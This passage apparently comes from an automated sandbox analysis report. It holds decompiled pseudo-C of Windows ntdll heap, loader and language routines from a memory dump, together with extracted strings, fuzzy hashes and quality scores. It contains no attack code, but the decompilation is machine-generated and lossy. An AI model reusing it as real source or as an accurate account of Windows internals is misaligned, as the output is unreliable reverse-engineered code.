                        							_pop(_t257);
                        							if(_t277 == 0) {
                        								L38:
                        								_t170 = _v48;
                        								if( *_v48 != 0) {
                        									E02BDBB40(0,  &_v68, _t170);
                        									if(L02BA43C0( &_v68,  &_v24) != 0) {
                        										_t280 =  &(_t280[0]);
                        									}
                        								}
                        								if(_t280 == 0) {
                        									_t280 = 0;
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                        									_v44 = 0;
                        									_v32 = 0;
                        								} else {
                        									_t280 = 0;
                        								}
                        								_t174 = _v8;
                        								if(_v8 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                        								}
                        								_v8 = _t280;
                        								goto L46;
                        							}
                        							_t243 = _v48;
                        							do {
                        								 *_t277 = 0;
                        								_t278 = _t277 + 2;
                        								E02BDBB40(_t257,  &_v68, _t243);
                        								if(L02BA43C0( &_v68,  &_v24) != 0) {
                        									_t280 =  &(_t280[0]);
                        								}
                        								_t243 = _t278;
                        								_t277 = E02BE1370(_t278, 0x2b74e90);
                        								_pop(_t257);
                        							} while (_t277 != 0);
                        							_v48 = _t243;
                        							_t242 = _v52;
                        							goto L38;
                        						}
                        					}
                        					_t191 = _v12;
                        					_t260 = _v12 + 4;
                        					_v28 = _t260;
                        					if(_t260 == 0) {
                        						_t275 = _t280;
                        						_v16 = _t280;
                        					} else {
                        						_t275 = L02BB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                        						_t191 = _v12;
                        						_v16 = _t275;
                        					}
                        					if(_t275 == 0) {
                        						_v28 = _t280;
                        						_t280 = 0xc0000017;
                        						goto L47;
                        					} else {
                        						E02BDF3E0(_t275, _v8, _t191);
                        						_t285 = _t285 + 0xc;
                        						_v48 = _t275;
                        						_t279 = _t280;
                        						_t281 = E02BE1370(_v16, 0x2b74e90);
                        						_pop(_t262);
                        						if(_t281 != 0) {
                        							_t244 = _v48;
                        							do {
                        								 *_t281 = 0;
                        								_t282 = _t281 + 2;
                        								E02BDBB40(_t262,  &_v68, _t244);
                        								if(L02BA43C0( &_v68,  &_v24) != 0) {
                        									_t279 =  &(_t279[0]);
                        								}
                        								_t244 = _t282;
                        								_t281 = E02BE1370(_t282, 0x2b74e90);
                        								_pop(_t262);
                        							} while (_t281 != 0);
                        							_v48 = _t244;
                        							_t242 = _v52;
                        						}
                        						_t201 = _v48;
                        						_t280 = 0;
                        						if( *_v48 != 0) {
                        							E02BDBB40(_t262,  &_v68, _t201);
                        							if(L02BA43C0( &_v68,  &_v24) != 0) {
                        								_t279 =  &(_t279[0]);
                        							}
                        						}
                        						if(_t279 == 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                        							_v28 = _t280;
                        							_v16 = _t280;
                        						}
                        						_t202 = _v8;
                        						if(_v8 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                        						}
                        						_v8 = _t280;
                        						goto L28;
                        					}
                        				}
                        				_t214 = _v12;
                        				_t264 = _v12 + 4;
                        				_v40 = _t264;
                        				if(_t264 == 0) {
                        					_v20 = _t280;
                        				} else {
                        					_t236 = L02BB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                        					_t280 = _t236;
                        					_v20 = _t236;
                        					_t214 = _v12;
                        				}
                        				if(_t280 == 0) {
                        					_t161 = 0;
                        					_t280 = 0xc0000017;
                        					_v40 = 0;
                        					goto L48;
                        				} else {
                        					E02BDF3E0(_t280, _v8, _t214);
                        					_t285 = _t285 + 0xc;
                        					_v48 = _t280;
                        					_t283 = E02BE1370(_t280, 0x2b74e90);
                        					_pop(_t267);
                        					if(_t283 != 0) {
                        						_t245 = _v48;
                        						do {
                        							 *_t283 = 0;
                        							_t284 = _t283 + 2;
                        							E02BDBB40(_t267,  &_v68, _t245);
                        							if(L02BA43C0( &_v68,  &_v24) != 0) {
                        								_t275 = _t275 + 1;
                        							}
                        							_t245 = _t284;
                        							_t283 = E02BE1370(_t284, 0x2b74e90);
                        							_pop(_t267);
                        						} while (_t283 != 0);
                        						_v48 = _t245;
                        						_t242 = _v52;
                        					}
                        					_t224 = _v48;
                        					_t280 = 0;
                        					if( *_v48 != 0) {
                        						E02BDBB40(_t267,  &_v68, _t224);
                        						if(L02BA43C0( &_v68,  &_v24) != 0) {
                        							_t275 = _t275 + 1;
                        						}
                        					}
                        					if(_t275 == 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                        						_v40 = _t280;
                        						_v20 = _t280;
                        					}
                        					_t225 = _v8;
                        					if(_v8 != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                        					}
                        					_v8 = _t280;
                        					goto L16;
                        				}
                        			}










































                        0x02ba3d3c
                        0x02ba3d42
                        0x02ba3d44
                        0x02ba3d46
                        0x02ba3d49
                        0x02ba3d4c
                        0x02ba3d4f
                        0x02ba3d52
                        0x02ba3d55
                        0x02ba3d58
                        0x02ba3d5b
                        0x02ba3d5f
                        0x02ba3d61
                        0x02ba3d66
                        0x02bf8213
                        0x02bf8218
                        0x02ba4085
                        0x02ba4088
                        0x02ba408e
                        0x02ba4094
                        0x02ba409a
                        0x02ba40a0
                        0x02ba40a6
                        0x02ba40a9
                        0x02ba40af
                        0x02ba40b6
                        0x02ba40bd
                        0x02ba40bd
                        0x02ba3d83
                        0x02bf821f
                        0x02bf8229
                        0x02bf8238
                        0x02bf8238
                        0x02bf823d
                        0x02bf823d
                        0x02ba3da0
                        0x02ba3daf
                        0x02ba3db5
                        0x02ba3dba
                        0x02ba3dba
                        0x02ba3dd4
                        0x02ba3e94
                        0x02ba3eab
                        0x02ba3f6d
                        0x02ba3f84
                        0x02ba406b
                        0x02ba406b
                        0x02ba406e
                        0x02ba406e
                        0x02ba4070
                        0x02ba4074
                        0x02bf8351
                        0x02bf8351
                        0x02ba407a
                        0x02ba407f
                        0x02bf835d
                        0x02bf8370
                        0x02bf8377
                        0x02bf8379
                        0x02bf837c
                        0x02bf837c
                        0x02bf835d
                        0x00000000
                        0x02ba407f
                        0x02ba3f8a
                        0x02ba3f8d
                        0x02ba3f90
                        0x02ba3f95
                        0x02bf830d
                        0x02bf830f
                        0x02ba3f9b
                        0x02ba3fac
                        0x02ba3fae
                        0x02ba3fb1
                        0x02ba3fb1
                        0x02ba3fb6
                        0x02bf8317
                        0x02bf831a
                        0x00000000
                        0x02ba3fbc
                        0x02ba3fc1
                        0x02ba3fc9
                        0x02ba3fd7
                        0x02ba3fda
                        0x02ba3fdd
                        0x02ba4021
                        0x02ba4021
                        0x02ba4029
                        0x02ba4030
                        0x02ba4044
                        0x02ba4046
                        0x02ba4046
                        0x02ba4044
                        0x02ba4049
                        0x02bf8327
                        0x02bf8334
                        0x02bf8339
                        0x02bf833c
                        0x02ba404f
                        0x02ba404f
                        0x02ba404f
                        0x02ba4051
                        0x02ba4056
                        0x02ba4063
                        0x02ba4063
                        0x02ba4068
                        0x00000000
                        0x02ba4068
                        0x02ba3fdf
                        0x02ba3fe2
                        0x02ba3fe4
                        0x02ba3fe7
                        0x02ba3fef
                        0x02ba4003
                        0x02ba4005
                        0x02ba4005
                        0x02ba400c
                        0x02ba4013
                        0x02ba4016
                        0x02ba4017
                        0x02ba401b
                        0x02ba401e
                        0x00000000
                        0x02ba401e
                        0x02ba3fb6
                        0x02ba3eb1
                        0x02ba3eb4
                        0x02ba3eb7
                        0x02ba3ebc
                        0x02bf82a9
                        0x02bf82ab
                        0x02ba3ec2
                        0x02ba3ed3
                        0x02ba3ed5
                        0x02ba3ed8
                        0x02ba3ed8
                        0x02ba3edd
                        0x02bf82b3
                        0x02bf82b6
                        0x00000000
                        0x02ba3ee3
                        0x02ba3ee8
                        0x02ba3eed
                        0x02ba3ef0
                        0x02ba3ef3
                        0x02ba3f02
                        0x02ba3f05
                        0x02ba3f08
                        0x02bf82c0
                        0x02bf82c3
                        0x02bf82c5
                        0x02bf82c8
                        0x02bf82d0
                        0x02bf82e4
                        0x02bf82e6
                        0x02bf82e6
                        0x02bf82ed
                        0x02bf82f4
                        0x02bf82f7
                        0x02bf82f8
                        0x02bf82fc
                        0x02bf82ff
                        0x02bf82ff
                        0x02ba3f0e
                        0x02ba3f11
                        0x02ba3f16
                        0x02ba3f1d
                        0x02ba3f31
                        0x02bf8307
                        0x02bf8307
                        0x02ba3f31
                        0x02ba3f39
                        0x02ba3f48
                        0x02ba3f4d
                        0x02ba3f50
                        0x02ba3f50
                        0x02ba3f53
                        0x02ba3f58
                        0x02ba3f65
                        0x02ba3f65
                        0x02ba3f6a
                        0x00000000
                        0x02ba3f6a
                        0x02ba3edd
                        0x02ba3dda
                        0x02ba3ddd
                        0x02ba3de0
                        0x02ba3de5
                        0x02bf8245
                        0x02ba3deb
                        0x02ba3df7
                        0x02ba3dfc
                        0x02ba3dfe
                        0x02ba3e01
                        0x02ba3e01
                        0x02ba3e06
                        0x02bf824d
                        0x02bf824f
                        0x02bf8254
                        0x00000000
                        0x02ba3e0c
                        0x02ba3e11
                        0x02ba3e16
                        0x02ba3e19
                        0x02ba3e29
                        0x02ba3e2c
                        0x02ba3e2f
                        0x02bf825c
                        0x02bf825f
                        0x02bf8261
                        0x02bf8264
                        0x02bf826c
                        0x02bf8280
                        0x02bf8282
                        0x02bf8282
                        0x02bf8289
                        0x02bf8290
                        0x02bf8293
                        0x02bf8294
                        0x02bf8298
                        0x02bf829b
                        0x02bf829b
                        0x02ba3e35
                        0x02ba3e38
                        0x02ba3e3d
                        0x02ba3e44
                        0x02ba3e58
                        0x02bf82a3
                        0x02bf82a3
                        0x02ba3e58
                        0x02ba3e60
                        0x02ba3e6f
                        0x02ba3e74
                        0x02ba3e77
                        0x02ba3e77
                        0x02ba3e7a
                        0x02ba3e7f
                        0x02ba3e8c
                        0x02ba3e8c
                        0x02ba3e91
                        0x00000000
                        0x02ba3e91

                        Strings
                        • Kernel-MUI-Language-Disallowed, xrefs: 02BA3E97
                        • Kernel-MUI-Number-Allowed, xrefs: 02BA3D8C
                        • Kernel-MUI-Language-SKU, xrefs: 02BA3F70
                        • WindowsExcludedProcs, xrefs: 02BA3D6F
                        • Kernel-MUI-Language-Allowed, xrefs: 02BA3DC0
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: a445f576ebce33b4e25747b25d687314752749ff207e255d0c6c88358e7d8e62
                        • Instruction ID: 409408a7a1801c7c5baa64976b7c27fa162a2742023b72dcc2c6ded0c6c69690
                        • Opcode Fuzzy Hash: a445f576ebce33b4e25747b25d687314752749ff207e255d0c6c88358e7d8e62
                        • Instruction Fuzzy Hash: 4CF15872D14618EBCB11DF98C990AEEBBF9FF48750F1540AAE905A7210E7709E04CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E02B940E1(void* __edx) {
                        				void* _t19;
                        				void* _t29;
                        
                        				_t28 = _t19;
                        				_t29 = __edx;
                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push("HEAP: ");
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Invalid heap signature for heap at %p", _t28);
                        					if(_t29 != 0) {
                        						E02B9B150(", passed to %s", _t29);
                        					}
                        					_push("\n");
                        					E02B9B150();
                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        						 *0x2c86378 = 1;
                        						asm("int3");
                        						 *0x2c86378 = 0;
                        					}
                        					return 0;
                        				}
                        				return 1;
                        			}





                        0x02b940e6
                        0x02b940e8
                        0x02b940f1
                        0x02bf042d
                        0x02bf044c
                        0x02bf0451
                        0x02bf042f
                        0x02bf0444
                        0x02bf0449
                        0x02bf045d
                        0x02bf0466
                        0x02bf046e
                        0x02bf0474
                        0x02bf0475
                        0x02bf047a
                        0x02bf048a
                        0x02bf048c
                        0x02bf0493
                        0x02bf0494
                        0x02bf0494
                        0x00000000
                        0x02bf049b
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 6bdf6a096fc87b79695d404b6f38f2dc3a577c1817dacdd74a50fca01ab87dd1
                        • Instruction ID: 16551ea1caf1a441f528371c2ed1d2408fb25ddaeab743a5baab10d7791d297e
                        • Opcode Fuzzy Hash: 6bdf6a096fc87b79695d404b6f38f2dc3a577c1817dacdd74a50fca01ab87dd1
                        • Instruction Fuzzy Hash: 5A0128321106509EF615E764A40EF9277B8DB02F34F2884F9F1194B772CBE494C4C920
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02BBA229(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				char _v28;
                        				void* _v44;
                        				void* _v48;
                        				void* _v56;
                        				void* _v60;
                        				void* __ebx;
                        				signed int _t55;
                        				signed int _t57;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t65;
                        				void* _t71;
                        				signed char* _t74;
                        				intOrPtr _t75;
                        				signed char* _t80;
                        				intOrPtr _t81;
                        				void* _t82;
                        				signed char* _t85;
                        				signed char _t91;
                        				void* _t103;
                        				void* _t105;
                        				void* _t121;
                        				void* _t129;
                        				signed int _t131;
                        				void* _t133;
                        
                        				_t105 = __ecx;
                        				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                        				_t103 = __edx;
                        				_t129 = __ecx;
                        				E02BBDF24(__edx,  &_v28, _t133);
                        				_t55 =  *(_t129 + 0x40) & 0x00040000;
                        				asm("sbb edi, edi");
                        				_t121 = ( ~_t55 & 0x0000003c) + 4;
                        				if(_t55 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t129);
                        					_push(0xffffffff);
                        					_t57 = E02BD9730();
                        					__eflags = _t57;
                        					if(_t57 < 0) {
                        						L17:
                        						_push(_t105);
                        						E02C5A80D(_t129, 1, _v20, 0);
                        						_t121 = 4;
                        						goto L1;
                        					}
                        					__eflags = _v20 & 0x00000060;
                        					if((_v20 & 0x00000060) == 0) {
                        						goto L17;
                        					}
                        					__eflags = _v24 - _t129;
                        					if(_v24 == _t129) {
                        						goto L1;
                        					}
                        					goto L17;
                        				}
                        				L1:
                        				_push(_t121);
                        				_push(0x1000);
                        				_push(_t133 + 0x14);
                        				_push(0);
                        				_push(_t133 + 0x20);
                        				_push(0xffffffff);
                        				_t61 = E02BD9660();
                        				_t122 = _t61;
                        				if(_t61 < 0) {
                        					_t62 =  *[fs:0x30];
                        					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                        					__eflags =  *(_t62 + 0xc);
                        					if( *(_t62 + 0xc) == 0) {
                        						_push("HEAP: ");
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *((intOrPtr*)(_t133 + 0xc)));
                        					_push( *((intOrPtr*)(_t133 + 0x14)));
                        					_push(_t129);
                        					E02B9B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                        					_t65 = 0;
                        					L13:
                        					return _t65;
                        				}
                        				_t71 = E02BB7D50();
                        				_t124 = 0x7ffe0380;
                        				if(_t71 != 0) {
                        					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t74 = 0x7ffe0380;
                        				}
                        				if( *_t74 != 0) {
                        					_t75 =  *[fs:0x30];
                        					__eflags =  *(_t75 + 0x240) & 0x00000001;
                        					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                        						E02C5138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                        					}
                        				}
                        				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                        				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                        				if(E02BB7D50() != 0) {
                        					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t80 = _t124;
                        				}
                        				if( *_t80 != 0) {
                        					_t81 =  *[fs:0x30];
                        					__eflags =  *(_t81 + 0x240) & 0x00000001;
                        					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                        						__eflags = E02BB7D50();
                        						if(__eflags != 0) {
                        							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						E02C51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                        					}
                        				}
                        				_t82 = E02BB7D50();
                        				_t125 = 0x7ffe038a;
                        				if(_t82 != 0) {
                        					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        				} else {
                        					_t85 = 0x7ffe038a;
                        				}
                        				if( *_t85 != 0) {
                        					__eflags = E02BB7D50();
                        					if(__eflags != 0) {
                        						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        					}
                        					E02C51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                        				}
                        				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                        				_t91 =  *(_t103 + 2);
                        				if((_t91 & 0x00000004) != 0) {
                        					E02BED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                        					_t91 =  *(_t103 + 2);
                        				}
                        				 *(_t103 + 2) = _t91 & 0x00000017;
                        				_t65 = 1;
                        				goto L13;
                        			}






























                        0x02bba229
                        0x02bba231
                        0x02bba23f
                        0x02bba242
                        0x02bba244
                        0x02bba24c
                        0x02bba255
                        0x02bba25a
                        0x02bba25f
                        0x02c01c76
                        0x02c01c78
                        0x02c01c7e
                        0x02c01c7f
                        0x02c01c81
                        0x02c01c82
                        0x02c01c84
                        0x02c01c89
                        0x02c01c8b
                        0x02c01c9e
                        0x02c01c9e
                        0x02c01cab
                        0x02c01cb2
                        0x00000000
                        0x02c01cb2
                        0x02c01c8d
                        0x02c01c92
                        0x00000000
                        0x00000000
                        0x02c01c94
                        0x02c01c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c01c98
                        0x02bba265
                        0x02bba265
                        0x02bba266
                        0x02bba26f
                        0x02bba270
                        0x02bba276
                        0x02bba277
                        0x02bba279
                        0x02bba27e
                        0x02bba282
                        0x02c01db5
                        0x02c01dbb
                        0x02c01dc1
                        0x02c01dc5
                        0x02c01de4
                        0x02c01de9
                        0x02c01dc7
                        0x02c01ddc
                        0x02c01de1
                        0x02c01def
                        0x02c01df3
                        0x02c01df7
                        0x02c01dfe
                        0x02c01e06
                        0x02bba302
                        0x02bba308
                        0x02bba308
                        0x02bba288
                        0x02bba28d
                        0x02bba294
                        0x02c01cc1
                        0x02bba29a
                        0x02bba29a
                        0x02bba29a
                        0x02bba29f
                        0x02c01ccb
                        0x02c01cd1
                        0x02c01cd8
                        0x02c01cea
                        0x02c01cea
                        0x02c01cd8
                        0x02bba2a9
                        0x02bba2af
                        0x02bba2bc
                        0x02c01cfd
                        0x02bba2c2
                        0x02bba2c2
                        0x02bba2c2
                        0x02bba2c7
                        0x02c01d07
                        0x02c01d0d
                        0x02c01d14
                        0x02c01d1f
                        0x02c01d21
                        0x02c01d2c
                        0x02c01d2c
                        0x02c01d2c
                        0x02c01d47
                        0x02c01d47
                        0x02c01d14
                        0x02bba2cd
                        0x02bba2d2
                        0x02bba2d9
                        0x02c01d5a
                        0x02bba2df
                        0x02bba2df
                        0x02bba2df
                        0x02bba2e4
                        0x02c01d69
                        0x02c01d6b
                        0x02c01d76
                        0x02c01d76
                        0x02c01d76
                        0x02c01d91
                        0x02c01d91
                        0x02bba2ea
                        0x02bba2f0
                        0x02bba2f5
                        0x02c01da8
                        0x02c01dad
                        0x02c01dad
                        0x02bba2fd
                        0x02bba300
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                        • API String ID: 0-2586055223
                        • Opcode ID: 595860de21c4e5339cc02bf15ccebfcf90f80db86d3882a09142d650c09208c5
                        • Instruction ID: 555468e35a089908d6cd62bfca2e9117faaa3aa31a9f090301d3609d9b1fad2b
                        • Opcode Fuzzy Hash: 595860de21c4e5339cc02bf15ccebfcf90f80db86d3882a09142d650c09208c5
                        • Instruction Fuzzy Hash: F951E4726057809FD712DB68C888FB7B7E9FF80B54F1804A4F9998B2D1DBA4D940CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02BC8E00(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t43;
                        				void* _t46;
                        				intOrPtr _t47;
                        				void* _t48;
                        				signed int _t49;
                        				void* _t50;
                        				intOrPtr* _t51;
                        				signed int _t52;
                        				void* _t53;
                        				intOrPtr _t55;
                        
                        				_v8 =  *0x2c8d360 ^ _t52;
                        				_t49 = 0;
                        				_t48 = __ecx;
                        				_t55 =  *0x2c88464; // 0x75150110
                        				if(_t55 == 0) {
                        					L9:
                        					if( !_t49 >= 0) {
                        						if(( *0x2c85780 & 0x00000003) != 0) {
                        							E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                        						}
                        						if(( *0x2c85780 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        					}
                        					return E02BDB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                        				}
                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                        				_t43 =  *0x2c87984; // 0x2732af0
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                        					if(_t48 == _t43) {
                        						_t50 = 0x5c;
                        						if( *_t32 == _t50) {
                        							_t46 = 0x3f;
                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                        								_t32 = _t32 + 8;
                        							}
                        						}
                        					}
                        					_t51 =  *0x2c88464; // 0x75150110
                        					 *0x2c8b1e0(_t47, _t32,  &_v12);
                        					_t49 =  *_t51();
                        					if(_t49 >= 0) {
                        						L8:
                        						_t35 = _v12;
                        						if(_t35 != 0) {
                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                        								E02BC9B10( *((intOrPtr*)(_t48 + 0x48)));
                        								_t35 = _v12;
                        							}
                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                        						}
                        						goto L9;
                        					}
                        					if(_t49 != 0xc000008a) {
                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                        							if(_t49 != 0xc00000bb) {
                        								goto L8;
                        							}
                        						}
                        					}
                        					if(( *0x2c85780 & 0x00000005) != 0) {
                        						_push(_t49);
                        						E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                        						_t53 = _t53 + 0x1c;
                        					}
                        					_t49 = 0;
                        					goto L8;
                        				} else {
                        					goto L9;
                        				}
                        			}




















                        0x02bc8e0f
                        0x02bc8e16
                        0x02bc8e19
                        0x02bc8e1b
                        0x02bc8e21
                        0x02bc8e7f
                        0x02bc8e85
                        0x02c09354
                        0x02c0936c
                        0x02c09371
                        0x02c0937b
                        0x02c09381
                        0x02c09381
                        0x02c0937b
                        0x02bc8e9d
                        0x02bc8e9d
                        0x02bc8e29
                        0x02bc8e2c
                        0x02bc8e38
                        0x02bc8e3e
                        0x02bc8e43
                        0x02bc8eb5
                        0x02bc8eb9
                        0x02c092aa
                        0x02c092af
                        0x02c092e8
                        0x02c092e8
                        0x02c092af
                        0x02bc8eb9
                        0x02bc8e45
                        0x02bc8e53
                        0x02bc8e5b
                        0x02bc8e5f
                        0x02bc8e78
                        0x02bc8e78
                        0x02bc8e7d
                        0x02bc8ec3
                        0x02bc8ecd
                        0x02bc8ed2
                        0x02bc8ed2
                        0x02bc8ec5
                        0x02bc8ec5
                        0x00000000
                        0x02bc8e7d
                        0x02bc8e67
                        0x02bc8ea4
                        0x02c0931a
                        0x00000000
                        0x00000000
                        0x02c09320
                        0x02bc8ea4
                        0x02bc8e70
                        0x02c09325
                        0x02c09340
                        0x02c09345
                        0x02c09345
                        0x02bc8e76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 02C09357
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02C0933B, 02C09367
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02C0932A
                        • LdrpFindDllActivationContext, xrefs: 02C09331, 02C0935D
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: 082e2f3cf10e0e25c297855829761930eae3ab8310cd35ebe2fb368527f2b93d
                        • Instruction ID: 4dc871cf4e03cab692cbc4cea8743b367a67d63827bcbf467c47801cdf5f0e7c
                        • Opcode Fuzzy Hash: 082e2f3cf10e0e25c297855829761930eae3ab8310cd35ebe2fb368527f2b93d
                        • Instruction Fuzzy Hash: 20414CB2E403179FEB36AB58CC88B35B375EB44748F2685EDE41957191E770AD80C781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 0-336120773
                        • Opcode ID: d0540fa3b294502f5198189835336ad49b468a51b184acc8fb457f905c2a16fd
                        • Instruction ID: 8bd9a89f3ccfe173bf12860990a4671166faf4d0d6c2fb5c5b9e184032a97801
                        • Opcode Fuzzy Hash: d0540fa3b294502f5198189835336ad49b468a51b184acc8fb457f905c2a16fd
                        • Instruction Fuzzy Hash: 42312631150124EFE764DFA8C885FA773A9EF41B24F1545A5F81A8B260E770E9C0EE6C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02BA8794(void* __ecx) {
                        				signed int _v0;
                        				char _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
